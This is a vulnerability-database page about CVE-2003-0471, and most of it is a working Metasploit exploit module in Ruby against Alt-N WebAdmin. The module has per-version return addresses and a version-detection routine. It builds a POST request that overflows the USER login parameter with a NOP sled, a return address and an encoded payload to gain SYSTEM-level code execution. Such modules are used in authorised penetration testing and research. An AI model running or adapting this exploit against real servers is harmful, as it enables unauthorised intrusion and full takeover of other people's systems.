Alt-N WebAdmin USER Buffer Overflow

🗓️ 26 Nov 2009 00:00:00Reported by MCType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Alt-N WebAdmin USER Buffer Overflow prone to a buffer overflow condition, allowing code execution with SYSTEM level privileges

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2003-0471	15 Feb 201000:00	–	circl
Check Point Advisories	AltN WebAdmin USER Buffer Overflow - Ver2 (CVE-2003-0471)	28 Dec 201400:00	–	checkpoint_advisories
CVE	CVE-2003-0471	28 Jun 200304:00	–	cve
Cvelist	CVE-2003-0471	28 Jun 200304:00	–	cvelist
Exploit DB	Alt-N WebAdmin - USER Buffer Overflow (Metasploit)	15 Feb 201000:00	–	exploitdb
Metasploit	Alt-N WebAdmin USER Buffer Overflow	17 Jan 200601:11	–	metasploit
NVD	CVE-2003-0471	7 Aug 200304:00	–	nvd
OpenVAS	webadmin.dll detection	3 Nov 200500:00	–	openvas
OpenVAS	webadmin.dll CGI Multiple Vulnerabilities	3 Nov 200500:00	–	openvas
Tenable Nessus	Alt-N WebAdmin Multiple Vulnerabilities	24 Jun 200300:00	–	nessus

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Alt-N WebAdmin USER Buffer Overflow',  
'Description' => %q{  
Alt-N WebAdmin is prone to a buffer overflow condition. This  
is due to insufficient bounds checking on the USER  
parameter. Successful exploitation could result in code  
execution with SYSTEM level privileges.  
},  
'Author' => [ 'MC' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2003-0471' ],  
[ 'OSVDB', '2207' ],  
[ 'BID', '8024'],  
[ 'NSS', '11771'],  
  
],  
'Privileged' => false,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 830,  
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",  
'StackAdjustment' => -3500,  
  
},  
'Platform' => 'win',  
'Targets' =>   
[  
['WebAdmin 2.0.4 Universal', { 'Ret' => 0x10074d9b }], # 2.0.4 webAdmin.dll  
['WebAdmin 2.0.3 Universal', { 'Ret' => 0x10074b13 }], # 2.0.3 webAdmin.dll  
['WebAdmin 2.0.2 Universal', { 'Ret' => 0x10071e3b }], # 2.0.2 webAdmin.dll  
['WebAdmin 2.0.1 Universal', { 'Ret' => 0x100543c2 }], # 2.0.1 webAdmin.dll   
],  
'DisclosureDate' => 'Jun 24 2003'))  
  
register_options([Opt::RPORT(1000)], self.class)  
end  
  
# Identify the target based on the WebAdmin version number  
def autofilter  
res = send_request_raw({  
'uri' => '/WebAdmin.DLL'  
}, -1)  
  
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)  
case $1  
when /2\.0\.4/  
datastore['TARGET'] = 0  
when /2\.0\.3/  
datastore['TARGET'] = 1   
when /2\.0\.2/  
datastore['TARGET'] = 2  
when /2\.0\.1/  
datastore['TARGET'] = 3  
else  
return false  
end  
  
return true  
end  
  
# Not vulnerable  
return false  
end  
  
def exploit  
  
user_cook = rand_text_alphanumeric(2)  
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded  
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'  
  
print_status("Sending request...")  
res = send_request_cgi({  
'uri' => '/WebAdmin.DLL',  
'query' => 'View=Logon',  
'method' => 'POST',  
'content-type' => 'application/x-www-form-urlencoded',  
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",  
'data' => post_data,  
'headers' =>   
{  
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',  
'Accept-Language' => 'en',  
'Accept-Charset' => 'iso-8859-1,*,utf-8'  
}  
}, 5)  
  
handler  
end  
  
end  
`

26 Nov 2009 00:00Current

0.9Low risk

Vulners AI Score0.9

EPSS0.68925